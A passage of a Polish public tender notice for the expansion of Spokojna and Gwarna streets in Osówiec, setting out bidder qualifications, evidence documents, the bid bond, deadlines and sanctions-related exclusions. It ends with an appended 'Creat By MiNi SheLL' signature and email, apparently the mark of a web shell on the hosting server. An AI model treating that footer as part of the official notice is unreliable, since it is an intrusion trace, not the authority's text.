zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie określa warunku <br/>w powyższym zakresie,<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika <br/>to z odrębnych przepisów – Zamawiający nie określa warunku w powyższym zakresie,<br/><br/>3)	sytuacji ekonomicznej i finansowej - Zamawiający stwierdzi, iż Wykonawca spełnił warunek udziału w postępowaniu w zakresie sytuacji finansowej, jeśli złoży oświadczenie zgodnie z wzorem stanowiącym załączniki 2 do SWZ oraz wykaże, że posiada odpowiednie ubezpieczenie <br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 2 000.000,00 zł.<br/>W celu potwierdzenia spełniania przez wykonawcę warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej zamawiający żąda przedstawienia dokumentu potwierdzającego, <br/>że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego. Jeżeli <br/>z uzasadnionej przyczyny wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub ekonomicznej wymaganych przez zamawiającego, może złożyć inny dokument, który <br/>w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku udziału <br/>w postępowaniu. <br/><br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców, powyższe warunki Wykonawcy mogą spełniać łącznie.<br/><br/>4)	zdolności technicznej lub zawodowej - o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy złożą oświadczenie zgodnie z wzorem stanowiącym załączniki 2 do SWZ oraz wykażą, że:<br/>a)	nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy, <br/>w tym okresie wykonali w sposób należyty oraz zgodnie z przepisami prawa budowlanego <br/>i prawidłowo ukończyli co najmniej 1 robotę budowlaną polegającą na budowie, przebudowie <br/>lub remoncie dróg, ulic lub placów o nawierzchni z brukowej kostki betonowej o wartości <br/>min. 2 000 000,00 zł brutto,<br/><br/>b)	dysponują osobami zdolnymi do wykonywania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, tj. posiadającymi prawo do wykonywania samodzielnych funkcji technicznych <br/>w budownictwie zgodnie z poniższym wyszczególnieniem:<br/>	Kierownik budowy – co najmniej 1 osoba do pełnienia samodzielnych funkcji technicznych <br/>w budownictwie w zakresie kierowania robotami budowlanymi w specjalności drogowej, osoba ta musi posiadać następujące kwalifikacje:<br/>	co najmniej 5 lat doświadczenia jako Kierownik budowy, <br/>	doświadczenie w kierowaniu budową - co najmniej jednej inwestycji obejmującej budowę przebudowę lub rozbudowę dróg, ulic lub placów o nawierzchni utwardzonej, o wartości co najmniej 1 000 000,00 zł brutto,<br/>	Kierownika robót branżowych – co najmniej 1 osoba do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. Zamawiający wymaga aby osoba ta posiadała co najmniej 5 lat doświadczenia jako Kierownik przedmiotowych robót branżowych, <br/><br/>	Kierownika robót branżowych –co najmniej 1 osoba do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Zamawiający wymaga aby osoba ta posiadała co najmniej 5 lat doświadczenia jako Kierownik przedmiotowych robót branżowych.<br/>Osoby wymienione w pkt 4) lit. b) powinny posiadać uprawnienia budowlane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2023r. poz. 682 ze zm.) oraz Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r. poz. 831) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do w/w zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy Prawo budowlane.<br/><br/>c)	dysponują sprzętem i narzędziami niezbędnym do wykonania zamówienia publicznego. Wykonawca powinien dysponować na czas realizacji zamówienia w celu właściwej realizacji zamówienia: dwie koparko-spycharki, jeden walec drogowy, jedna układarka do układania kruszywa niezwiązanego dwie zagęszczarki płytowe do zagęszczania gruntu, jeden żuraw samochodowy 6 ton, środki transportu w tym min: dwa samochody ciężarowe o ładowności min. 10 ton każdy, dwie piły <br/>do betonu, elektronarzędzia oraz ewentualnie inne w ocenie Wykonawcy niezbędne do wykonania zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji <br/>i konsumentów (Dz. U. z 2023r. poz. 1689 ze zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej,<br/>Wzór oświadczenia zostanie przesłany wykonawcy wraz z wezwaniem do złożenia podmiotowych środków dowodowych,<br/><br/>2)	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej <br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, <br/>o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty,<br/>Wzór wykazu zostanie przesłany wykonawcy wraz z wezwaniem do złożenia podmiotowych środków dowodowych,<br/><br/>2)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, oświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami,<br/>Wzór wykazu zostanie przesłany wykonawcy wraz z wezwaniem do złożenia podmiotowych środków dowodowych,<br/><br/>3)	wykaz sprzętu i narzędzi niezbędnych do wykonania zamówienia publicznego.<br/>Wzór wykazu zostanie przesłany wykonawcy wraz z wezwaniem do złożenia podmiotowych środków dowodowych.<br/><br/>4)	polisa ubezpieczeniowa potwierdzająca odpowiednie ubezpieczenie od odpowiedzialności cywilnej <br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium w wysokości 40 000,00 zł. (słownie: czterdzieści tysięcy złotych).<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 i ust. 2.<br/>3.	Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia <br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. z 2024r. <br/>poz. 419).<br/>5.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego tj.: Bank Spółdzielczy w Bydgoszczy o/Sicienko, Nr rachunku: 57 8142 1046 0000 0127 5000 0013, wpisując w tytuł przelewu nazwę zadania na jakie jest wnoszone tj. „Rozbudowa drogi gminnej ul. Spokojna i ul. Gwarna w Osówcu”.<br/>6.	W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego.<br/>7.	Jeżeli wadium wniesiono w formie innej niż w pieniądzu, wykonawca przekaże zamawiającemu oryginał gwarancji lub poręczenia w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu, poprzez dołączenie do oferty. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia, o których mowa w Rozdziale VIII pkt. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/>z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy w odniesieniu <br/>do warunków, które zostały określone w Rozdziale VII pkt 2 SWZ – zgodnie z załącznikiem nr 4 do SWZ.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5.	Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty <br/>w zakresie uregulowanym w art. 455 uPzp oraz wskazanym w Istotnych postanowieniach umowy, która stanowi załącznik 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-05 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/sicienko</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-05 08:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-03</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia obligatoryjnie wyklucza się Wykonawcę w przypadkach, o których mowa w art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>a)	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka,<br/><br/>b) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124 ze zm.) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka,<br/><br/>c)	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023r. poz. 120 ze zm.) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka

Creat By MiNi SheLL
Email: jattceo@gmail.com